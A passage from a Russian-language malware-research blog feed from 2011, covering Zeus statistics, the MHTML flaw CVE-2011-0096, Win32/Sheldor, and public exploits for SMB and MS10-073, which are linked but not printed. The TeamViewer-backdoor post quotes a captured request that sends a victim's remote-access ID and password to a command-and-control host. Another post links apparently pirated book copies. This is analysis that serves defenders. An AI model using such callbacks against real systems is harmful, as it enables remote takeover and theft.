винды, но ничего страшного сделать с ними нельзя кроме DoS.  &lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.metasploit.com/redmine/projects/framework/repository/revisions/11756/entry/modules/auxiliary/dos/windows/smb/ms11_xxx_electbowser.rb"&gt;Сплойт в составе Metasploit&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4585398188316979639?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4585398188316979639/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/02/ms-windows-smb-mrxsmbsys-remote-heap.html#comment-form' title='Комментарии: 1'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4585398188316979639'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4585398188316979639'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/02/ms-windows-smb-mrxsmbsys-remote-heap.html' title='MS Windows SMB &quot;mrxsmb.sys&quot; Remote Heap Overflow'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7414104571118728411</id><published>2011-02-11T17:32:00.003+03:00</published><updated>2011-02-11T17:35:54.921+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='SpyEye'/><category scheme='http://www.blogger.com/atom/ns#' term='Zeus'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Зевс по прежнему актуален</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Тут стало популярным мнение о том, что зевс (Win32/Spy.Zbot) практически загнулся. Но на самом деле он еще долго будет барахтаться в предсмертных конвульсиях и приносить не которым неплохие деньги. Более того, процент участия вредоносных программ из этого семейства в инцидентах связанных с ДБО, тоже достаточно высок. Так, что похороны были как минимум преждевременными. &lt;br&gt;&lt;br&gt;Бот билдер с админкой старых версей не раз утекал в свободный доступ, а появление SpyEye конечно снизило число предложений о продаже зевса, но они по прежнему есть. Так вот тут буквально вчера MS &lt;a href="http://blogs.technet.com/b/mmpc/archive/2011/02/10/battling-the-zbot-threat-with-msrt.aspx"&gt;показала&lt;/a&gt; интересную статистику:&lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-hcY0DtSulFE/TVU_BkeS4JI/AAAAAAAAAy0/-mw6JnjN3ZA/s1600/zbotmsrt-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-hcY0DtSulFE/TVU_BkeS4JI/AAAAAAAAAy0/-mw6JnjN3ZA/s400/zbotmsrt-1.png" width="377"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/02/blog-post_11.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7414104571118728411?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7414104571118728411/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/02/blog-post_11.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7414104571118728411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7414104571118728411'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/02/blog-post_11.html' title='Зевс по прежнему актуален'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-hcY0DtSulFE/TVU_BkeS4JI/AAAAAAAAAy0/-mw6JnjN3ZA/s72-c/zbotmsrt-1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-2015033267387202250</id><published>2011-02-08T20:18:00.001+03:00</published><updated>2011-02-08T20:27:41.856+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><title type='text'>Снова засветился на НТВ</title><content type='html'>Сегодня исполнился ровно год с того момента, как в России появился центр вирусных исследовании и аналитики у компании ESET. И поэтому поводу о нас решили снять сюжет на НТВ и пустить его в прайм-тайм :) (это шутка и конечно было все не так, но поздравления в комменты все равно принимаются по поводу ДР центра =))&lt;br /&gt;&lt;br /&gt;&lt;object width="480" height="360"&gt;&lt;param name="movie" value="http://www1.ntv.ru/swf/vps1.swf?xmllink=http://www.ntv.ru/vi220559/"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;embed src="http://www1.ntv.ru/swf/vps1.swf?xmllink=http://www.ntv.ru/vi220559/" type="application/x-shockwave-flash" width="480" height="360" allowFullScreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-2015033267387202250?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/2015033267387202250/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/02/blog-post.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2015033267387202250'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2015033267387202250'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/02/blog-post.html' title='Снова засветился на НТВ'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4015675875560659036</id><published>2011-02-04T12:43:00.002+03:00</published><updated>2011-02-04T15:14:23.781+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FUN'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Эволюция client-side эксплойтов в картинках</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Как же просто все было в году эдак в 2004:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_gn-7ejyJv08/TUvIdvRUrxI/AAAAAAAAAyY/BTDlKmed4uA/s1600/old.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="277" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TUvIdvRUrxI/AAAAAAAAAyY/BTDlKmed4uA/s400/old.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;И как же все усложнилось сейчас:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TUvIirt38dI/AAAAAAAAAyg/-NHmPZZu5kY/s1600/new.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="230" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TUvIirt38dI/AAAAAAAAAyg/-NHmPZZu5kY/s400/new.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Обе картинки потырены наглым образом из презентации: &lt;br /&gt;Dino A. Dai Zovi &lt;br /&gt;"Memory Corruption, Exploitation, and You" (&lt;a href="http://trailofbits.files.wordpress.com/2010/11/owasp_201011.pdf"&gt;слайды&lt;/a&gt;)&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4015675875560659036?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4015675875560659036/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/02/client-side.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4015675875560659036'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4015675875560659036'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/02/client-side.html' title='Эволюция client-side эксплойтов в картинках'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_gn-7ejyJv08/TUvIdvRUrxI/AAAAAAAAAyY/BTDlKmed4uA/s72-c/old.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-2717571837791209014</id><published>2011-01-31T16:45:00.002+03:00</published><updated>2011-01-31T16:58:05.212+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Mobile'/><category scheme='http://www.blogger.com/atom/ns#' term='Android'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Концепт мобильного ботнета управляемого по SMS</title><content type='html'>На конференции Shmoocon'2011 был представлен интересный подход к построению мобильного ботнета с возможностью управления через SMS на телефонах на базе Android.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.grmn00bs.com/GeorgiaW_Smartphone_Bots_SLIDES_Shmoocon2011.pdf"&gt;Слайды презентации&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Видео с демонстрацией работы:&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/19372118" width="400" height="225" frameborder="0"&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/19372118"&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-2717571837791209014?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/2717571837791209014/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/01/sms.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2717571837791209014'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2717571837791209014'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/01/sms.html' title='Концепт мобильного ботнета управляемого по SMS'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-265841297169432091</id><published>2011-01-29T16:40:00.003+03:00</published><updated>2011-01-29T16:54:09.054+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Уязвимость в обработке MHTML протокола (CVE-2011-0096)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Около двух недель назад появилась интересная информация &amp;quot;&lt;a href="http://seclists.org/fulldisclosure/2011/Jan/224"&gt;Hacking with mhtml protocol handler&lt;/a&gt;&amp;quot;. Как оказалось очередной 0-дей в обработке MHTML, на этот раз уязвимость кроется в обработке MIME-formatted запросов. При определенных условиях злоумышленник может внедрить js-код, который выполниться на клиентской стороне. Последствия могут быть разные, например похищение аутентификационных данных для популярных сервисов или банальный XSS. Работает уязвимость только на IE, но зато для всех версий и видне начиная с ХР и выше.&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/01/mhtml-cve-2011-0096.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-265841297169432091?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/265841297169432091/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/01/mhtml-cve-2011-0096.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/265841297169432091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/265841297169432091'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/01/mhtml-cve-2011-0096.html' title='Уязвимость в обработке MHTML протокола (CVE-2011-0096)'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8841126631866969905</id><published>2011-01-24T20:46:00.000+03:00</published><updated>2011-01-24T20:46:27.642+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Win32/Sheldor - теперь малиновый ...</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Недавно уже писал про семейство &lt;a href="http://amatrosov.blogspot.com/2011/01/teamviewer.html"&gt;Win32/Sheldor&lt;/a&gt; и вот на днях граждане порадовали другой версией Win32/Sheldor.E (&lt;a href="http://www.virustotal.com/file-scan/report.html?id=4ff98b1d77ae2427a2b97376e40dbad50cb558b0c1ca649272b8e979bfbeaca8-1295886963"&gt;VT&lt;/a&gt;) с двумя интересными командами:&lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_gn-7ejyJv08/TT2xYPSyO_I/AAAAAAAAAxo/0B4k7STKITk/s1600/sheldor_e.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://2.bp.blogspot.com/_gn-7ejyJv08/TT2xYPSyO_I/AAAAAAAAAxo/0B4k7STKITk/s400/sheldor_e.png" width="400"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/01/win32sheldor.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8841126631866969905?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8841126631866969905/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/01/win32sheldor.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8841126631866969905'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8841126631866969905'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/01/win32sheldor.html' title='Win32/Sheldor - теперь малиновый ...'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_gn-7ejyJv08/TT2xYPSyO_I/AAAAAAAAAxo/0B4k7STKITk/s72-c/sheldor_e.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7685607442262633295</id><published>2011-01-21T13:11:00.003+03:00</published><updated>2011-01-21T13:29:29.923+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><title type='text'>Атака на антивирусные облака</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;На днях у себя в блоге MS опубликовала &lt;a href="http://blogs.technet.com/b/mmpc/archive/2011/01/19/bohu-takes-aim-at-the-cloud.aspx"&gt;заметку&lt;/a&gt; о китайском &lt;a href="http://www.virustotal.com/file-scan/report.html?id=aaccaec2468fd0ec9db22c1bdd429bb231179f9ce9a090fcdb80973c7e4ba83c-1295603002"&gt;троянце&lt;/a&gt;, который использует техники противодействия облачным антивирусным технологиям. С точки зрения приманки для журналистов все сработало, ибо заявление достаточно интересное, но на самом деле сей троянец достаточно прост и никаких инноваций в себе не несет. &lt;br&gt;&lt;br&gt;Итак, способы противодействия облакам:&lt;br&gt;- при установке в файлы добавляются блоки случайного разного размера содержащие случайные данные, видимо для того, чтобы хешики сбивать.&lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TTlXSs6ZzNI/AAAAAAAAAxM/wtjwFA0yh9U/s1600/p2_png.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="132" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TTlXSs6ZzNI/AAAAAAAAAxM/wtjwFA0yh9U/s400/p2_png.jpg" width="400"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/01/blog-post_21.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7685607442262633295?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7685607442262633295/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/01/blog-post_21.html#comment-form' title='Комментарии: 3'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7685607442262633295'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7685607442262633295'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/01/blog-post_21.html' title='Атака на антивирусные облака'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TTlXSs6ZzNI/AAAAAAAAAxM/wtjwFA0yh9U/s72-c/p2_png.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-9164717063156056682</id><published>2011-01-19T00:30:00.001+03:00</published><updated>2011-01-19T00:36:40.956+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Эксплойт для MS10-073 таки попал на паблик</title><content type='html'>Сегодня на Metasploit появился &lt;a href="https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/escalate/ms10_073_kbdlayout.rb"&gt;эксплойт&lt;/a&gt; для повышения привилегий до SYSTEM, через эксплуатацию уязвимости в неправильной обработки keyboard layout (win32k.sys). MS10-073 известен тем, что применялся червем Stuxnet для повышения привилегий на системах Win2000/WinXP и уже много где достаточно &lt;a href="http://amatrosov.blogspot.com/2010/11/stuxnet-under-microscope-revision-12.html"&gt;подробно разобран&lt;/a&gt; (&lt;a href="http://www.vupen.com/blog/20101018.Stuxnet_Win32k_Windows_Kernel_0Day_Exploit_CVE-2010-2743.php"&gt;анализ&lt;/a&gt; от vupen).&lt;br /&gt;&lt;br /&gt;В Canvas эксплойт для этой уязвимости попал примерно за месяц до выхода патча, но публичного эксплойта так никто и не сочинил. Возможно по причине того, что эксплойт не универсален и работает только на Win2000/WinXP. Появление этого эксплойта в Metasploit связано с &lt;a href="http://www.exploit-db.com/exploits/15985/"&gt;PoC&lt;/a&gt;, который разработал Ruben Santamarta aka &lt;a href="http://reversemode.com"&gt;reversemode&lt;/a&gt; и положил на паблик на прошлой неделе.&lt;br /&gt;&lt;br /&gt;А вот &lt;a href="http://habrahabr.ru/blogs/infosecurity/108903/#habracut"&gt;уязвимость&lt;/a&gt; с переполнением стека при обработке &lt;i&gt;SystemDefaultEUDCFont&lt;/i&gt; (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398"&gt;CVE-2010-4398&lt;/a&gt;) по прежнему не закрыта, а ведь прошло у больше двух месяцев.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-9164717063156056682?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/9164717063156056682/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/01/ms10-073.html#comment-form' title='Комментарии: 1'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9164717063156056682'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9164717063156056682'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/01/ms10-073.html' title='Эксплойт для MS10-073 таки попал на паблик'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8327729947584815210</id><published>2011-01-17T16:10:00.002+03:00</published><updated>2011-01-17T19:23:39.587+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Books'/><title type='text'>Чтиво для вирусного аналитика</title><content type='html'>Как то я уже писал о книге &lt;a href="http://amatrosov.blogspot.com/2010/10/malware-analysts-cookbook.html"&gt;Malware Analyst's Cookbook&lt;/a&gt; Если кому надо, то вот:&lt;br /&gt;&lt;b&gt;&lt;a href="http://depositfiles.com/files/3tgmhz81h"&gt;http://depositfiles.com/files/3tgmhz81h&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;А здесь все исходные тексты из книги: &lt;a href="http://code.google.com/p/malwarecookbook"&gt;http://code.google.com/p/malwarecookbook&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Еще недавно приобрел неплохую книжицу "&lt;a href="http://www.amazon.com/Guide-Kernel-Exploitation-Attacking-Core/dp/1597494860/ref=sr_1_1?ie=UTF8&amp;s=books&amp;qid=1295269485&amp;sr=1-1"&gt;A Guide to Kernel Exploitation: Attacking the Core&lt;/a&gt;", но в интернетах водится ее электронная версия:   &lt;br /&gt;&lt;b&gt;&lt;a href="http://depositfiles.com/files/a5v5r0xkh"&gt;http://depositfiles.com/files/a5v5r0xkh&lt;/a&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8327729947584815210?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8327729947584815210/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/01/blog-post.html#comment-form' title='Комментарии: 6'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8327729947584815210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8327729947584815210'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/01/blog-post.html' title='Чтиво для вирусного аналитика'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-5906657520956550762</id><published>2011-01-15T00:36:00.003+03:00</published><updated>2011-01-15T00:39:52.166+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>TeamViewer, как компонент бэкдора</title><content type='html'>Тут на днях коллегам из Group-IB попался интересный сэмпл, конечно он не просто так им попался и посредством него увели кругленькую сумму :) Собственно интересен он только тем, что дропер устанавливает в систему&amp;nbsp;TeamViewer предыдущей версии с одной модифицированной библиотекой, через которую и происходит общение с админкой.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TTC_ncFn1yI/AAAAAAAAAxI/VL1fORpp1qI/s1600/admin_panel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="32" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TTC_ncFn1yI/AAAAAAAAAxI/VL1fORpp1qI/s400/admin_panel.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;i&gt;GET /getinfo.php?id=414%20034%20883&amp;amp;pwd=6655&amp;amp;stat=1 HTTP/1.1&lt;/i&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;i&gt;User-Agent: x3&lt;/i&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;i&gt;Host: goeiuyi.net&lt;/i&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Во всем остальном интересного там ничего нет и все более чем стандартно. Детектим мы его, как Win32/Sheldor.NAD (&lt;a href="http://www.virustotal.com/file-scan/report.html?id=9f3ff234d5481da1c00a2466bc83f7bda5fb9a36ebc0b0db821a6dc3669fe4e6-1294926672"&gt;VT&lt;/a&gt;).&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 